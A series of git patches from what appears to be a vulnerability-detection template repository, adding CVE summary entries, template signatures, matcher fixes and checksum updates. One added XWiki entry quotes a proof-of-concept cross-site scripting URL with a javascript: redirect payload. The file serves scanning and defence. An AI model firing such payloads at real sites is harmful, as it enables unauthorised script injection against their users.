Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"} {"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"} {"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"} +{"ID":"CVE-2023-35158","Info":{"Name":"XWiki - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: \u003e /xwiki/bin/view/XWiki/Main?xpage=restore\u0026showBatch=true\u0026xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35158.yaml"} {"ID":"CVE-2023-35813","Info":{"Name":"Sitecore - Remote Code Execution","Severity":"critical","Description":"Multiple Sitecore products allow remote code execution. This affects Experience Manager, Experience Platform, and Experience Commerce through 10.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35813.yaml"} {"ID":"CVE-2023-35843","Info":{"Name":"NocoDB version \u003c= 0.106.1 - Arbitrary File Read","Severity":"high","Description":"NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35843.yaml"} {"ID":"CVE-2023-35844","Info":{"Name":"Lightdash version \u003c= 0.510.3 Arbitrary File Read","Severity":"high","Description":"packages/backend/src/routers in Lightdash before 0.510.3\nhas insecure file endpoints, e.g., they allow .. directory\ntraversal and do not ensure that an intended file extension\n(.csv or .png) is used.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-35844.yaml"} @@ -2183,6 +2185,7 @@ {"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"} {"ID":"CVE-2023-36306","Info":{"Name":"Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting","Severity":"medium","Description":"A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36306.yaml"} {"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross Site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"} +{"ID":"CVE-2023-36347","Info":{"Name":"POS Codekop v2.0 - Broken Authentication","Severity":"high","Description":"A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-36347.yaml"} {"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"medium","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"} {"ID":"CVE-2023-36845","Info":{"Name":"Juniper J-Web - Remote Code Execution","Severity":"critical","Description":"A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-36845.yaml"} {"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"} @@ -2268,6 +2271,7 @@ {"ID":"CVE-2023-44353","Info":{"Name":"Adobe ColdFusion WDDX Deserialization Gadgets","Severity":"critical","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-44353.yaml"} {"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"} {"ID":"CVE-2023-44812","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44812.yaml"} +{"ID":"CVE-2023-44813","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44813.yaml"} {"ID":"CVE-2023-4521","Info":{"Name":"Import XML and RSS Feeds \u003c 2.1.5 - Unauthenticated RCE","Severity":"critical","Description":"The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4521.yaml"} {"ID":"CVE-2023-45375","Info":{"Name":"PrestaShop PireosPay - SQL Injection","Severity":"high","Description":"In the module “PireosPay” (pireospay) up to version 1.7.9 from 01generator.com for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-45375.yaml"} {"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"} @@ -2275,6 +2279,7 @@ {"ID":"CVE-2023-45671","Info":{"Name":"Frigate \u003c 0.13.0 Beta 3 - Cross-Site Scripting","Severity":"medium","Description":"Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/\u003ccamera_name\u003e` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-45671.yaml"} {"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"} {"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"} +{"ID":"CVE-2023-45855","Info":{"Name":"qdPM 9.2 - Directory Traversal","Severity":"high","Description":"qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the /uploads URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-45855.yaml"} {"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} {"ID":"CVE-2023-46347","Info":{"Name":"PrestaShop Step by Step products Pack - SQL Injection","Severity":"critical","Description":"In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46347.yaml"} @@ -2310,6 +2315,7 @@ {"ID":"CVE-2023-5556","Info":{"Name":"Structurizr on-premises - Cross Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5556.yaml"} {"ID":"CVE-2023-5830","Info":{"Name":"ColumbiaSoft DocumentLocator - Improper Authentication","Severity":"critical","Description":"Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5830.yaml"} {"ID":"CVE-2023-5914","Info":{"Name":"Citrix StoreFront - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5914.yaml"} +{"ID":"CVE-2023-5991","Info":{"Name":"Hotel Booking Lite \u003c 4.8.5 - Arbitrary File Download \u0026 Deletion","Severity":"critical","Description":"The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5991.yaml"} {"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"} {"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"} {"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"} @@ -2348,6 +2354,7 @@ {"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"} {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} {"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"} +{"ID":"CVE-2024-1561","Info":{"Name":"Gradio Applications - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"} {"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"} {"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} {"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"} @@ -2380,6 +2387,7 @@ {"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"critical","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"} {"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"} {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} +{"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"} {"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"} {"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"} {"ID":"CVE-2024-31848","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31848.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 47012701c5..341b934c1f 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -235e457ee422c2956ae8e7b3cc7ca1d6 +6cee9d81045ba3fb25589784532a78e4 From e7ea6752ca30996eb12a320987aebf171aa4f6d3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 06:48:11 +0000 Subject: [PATCH 348/375] Auto Template Signing [Wed May 15 06:48:11 UTC 2024] :robot: --- http/cves/2023/CVE-2023-29827.yaml | 1 + http/cves/2023/CVE-2023-44813.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml index 5549e07aba..46f7357b4a 100644 --- a/http/cves/2023/CVE-2023-29827.yaml +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -45,3 +45,4 @@ http: part: body words: - "You are viewing page number" +# digest: 4b0a00483046022100d7ea0d1d7ce9e00af5998f5fa4b5960a70b471e26ecf0caf0577424bace640e0022100ba8f5c9f03136d87aa25b2eab3b136501334d2a57e61dbf0d049f384be7946e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml index 88f1ab7886..e8a8a086ed 100644 --- a/http/cves/2023/CVE-2023-44813.yaml +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -49,3 +49,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100acfa09d8753734777ae264a34a2301092b20f0e9752d3c46a2c1cd62a768413a02204a56fbddcb961f4ecc0a6a20bde95cc3eaef3f8e5f60254eec300b6c960addbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ce59c1b9b852cab0a0ea8c4e13b279c48816f4fb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 13:32:08 +0530 Subject: [PATCH 349/375] Fix FN matcher --- http/technologies/boa-web-server.yaml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/http/technologies/boa-web-server.yaml b/http/technologies/boa-web-server.yaml index ecde83d378..109d3bcf30 100644 --- a/http/technologies/boa-web-server.yaml +++ b/http/technologies/boa-web-server.yaml @@ -30,10 +30,6 @@ http: regex: - "Server: Boa/" - - type: status - status: - - 200 - extractors: - type: kval part: header From d81058bda39707c23ee1306ad39511e7298b5f49 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 13:34:24 +0530 Subject: [PATCH 350/375] extra matcher removed --- .../exposed-panels/fortinet/f5-next-central-manager.yaml | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/http/exposed-panels/fortinet/f5-next-central-manager.yaml b/http/exposed-panels/fortinet/f5-next-central-manager.yaml index 20b89da3fe..02873fe6ad 100644 --- a/http/exposed-panels/fortinet/f5-next-central-manager.yaml +++ b/http/exposed-panels/fortinet/f5-next-central-manager.yaml @@ -1,7 +1,7 @@ id: f5-next-central-manager info: - name: F5 Next Central Manager Login Panel - Detect + name: F5 Next Central Manager Panel - Detect author: EgemenKochisarli severity: info description: | @@ -28,12 +28,7 @@ http: matchers: - type: word words: - - "<title>BIG-IP Next | Central Manager" - - - type: word - part: header - words: - - "text/html" + - "BIG-IP Next | Central Manager" - type: status status: From f89e250ba8d6ecf276b1fae3eac2865a1bd48cee Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 08:10:27 +0000 Subject: [PATCH 351/375] Auto Generated New Template Addition List [Wed May 15 08:10:27 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3311911a44..535664e426 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ http/default-logins/softether/softether-vpn-default-login.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml http/exposed-panels/easyvista-panel.yaml +http/exposed-panels/fortinet/f5-next-central-manager.yaml http/exposed-panels/ghost-panel.yaml http/exposed-panels/matomo-panel.yaml http/exposed-panels/n8n-panel.yaml From 7da663c1e8e57e9dddf8da5456e42ae36f7fa589 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 15 May 2024 08:11:02 +0000 Subject: [PATCH 352/375] Auto Generated New Template Addition List [Wed May 15 08:11:02 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 535664e426..119242db54 100644 --- a/.new-additions +++ b/.new-additions @@ -29,6 +29,7 @@ http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/apache/apache-answer-detect.yaml +http/technologies/boa-web-server.yaml http/technologies/craftercms-detect.yaml http/technologies/imgproxy-detect.yaml http/technologies/statamic-detect.yaml From 7b3634d648d8a0c8d40a0c4db2c74c6bf800c7ec Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 15 May 2024 08:11:09 +0000 Subject: [PATCH 353/375] Auto Generated Templates Checksum [Wed May 15 08:11:09 UTC 2024] :robot: --- templates-checksum.txt | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d1c703ef35..864cff7685 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:0058f7deab6259dbd38b4404ee74975e45bc4f75 -cves.json-checksum.txt:c9eed153337837c2ce6b2ce89bb9bd59d39758a9 +cves.json:5cc15bbdbdf77cdc98f62333d1674a451ef23c76 +cves.json-checksum.txt:eaeeca8d28a10d9264e42d57757cbb121db0aada dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3010,7 +3010,7 @@ http/cves/2023/CVE-2023-2949.yaml:9fc7aee0d145a80fbd71cee3ff9e2267e33da980 http/cves/2023/CVE-2023-29622.yaml:2fdca251f44d548618b82372fce1fc53007ad8d3 http/cves/2023/CVE-2023-29623.yaml:190f636848087dae84be89aa535ffed1f5c02d97 http/cves/2023/CVE-2023-2982.yaml:9cedb0411e86004cfa66c75629847a8267266235 -http/cves/2023/CVE-2023-29827.yaml:d6b8d8dd39ad77d513e00403c358db3dbb4ce073 +http/cves/2023/CVE-2023-29827.yaml:90f368b70e029388425d8a5ce9c20f8653d6b77b http/cves/2023/CVE-2023-29887.yaml:e113d28b0ce375d0f46f3ca21f487a256def33f8 http/cves/2023/CVE-2023-29919.yaml:b533c1f55fa3bb3f71c7236830fd870e9b1bd26e http/cves/2023/CVE-2023-29922.yaml:7934ef556ed602ceda52383f485dab24bd6c53e5 @@ -3166,7 +3166,7 @@ http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3 http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542 http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166 -http/cves/2023/CVE-2023-44813.yaml:799d537f93a6a047dd34ac0c099fee60ec58fdab +http/cves/2023/CVE-2023-44813.yaml:8807d3e1cce247d7ccef3184d516c55213edd2a3 http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 @@ -3820,6 +3820,7 @@ http/exposed-panels/footprints-panel.yaml:710811c96a4264548ac4c5a43b1185f030179d http/exposed-panels/forcepoint-applicance.yaml:79eb429c835bf3e0a5073a95a56dc510c974010b http/exposed-panels/forcepoint.yaml:ad7a86c55f1d8d4d160a7fd2d5f739dfff7a64cb http/exposed-panels/forti/fortiadc-panel.yaml:c5e5b9d49eb70b71f037b1cb38495868e895bef8 +http/exposed-panels/fortinet/f5-next-central-manager.yaml:d762378ab72ddb5aa7d2efdcf5a81c9a04b5eddf http/exposed-panels/fortinet/fortiap-panel.yaml:10a66195ff6d6d49614a0cc15ad20d93cc75c823 http/exposed-panels/fortinet/fortiauthenticator-detect.yaml:6d66b0096515e57ba6be49aff722f6b7e408b1f8 http/exposed-panels/fortinet/forticlientems-panel.yaml:43090f0fc7417ee1bb80dc66bbacc277ed3ef5ff @@ -6633,6 +6634,7 @@ http/technologies/bigbluebutton-detect.yaml:d0fecbfe3234220cfc43fd3f3ac058474e71 